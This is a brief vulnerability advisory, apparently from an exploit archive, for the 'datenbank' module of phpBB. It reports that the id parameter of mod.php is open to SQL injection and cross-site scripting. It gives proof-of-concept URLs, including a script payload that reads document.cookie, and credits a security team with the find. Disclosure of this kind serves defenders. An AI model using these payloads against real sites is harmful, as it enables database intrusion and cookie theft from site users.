vulnerable mod: datenbank explaination: you can pass SQL Injection / Cross Site Scripting (Commands) in the id variable inside the mod.php (mod-datenbank) exploit: http://[target]/phpBB/moddb/mod.php?id='[SQL Injection] http://[target]/phpBB/moddb/mod.php?id='><script>alert(document.cookie) </script> this bugs discovered by : neO SGT SecurityGurus Team www.securitygurus.net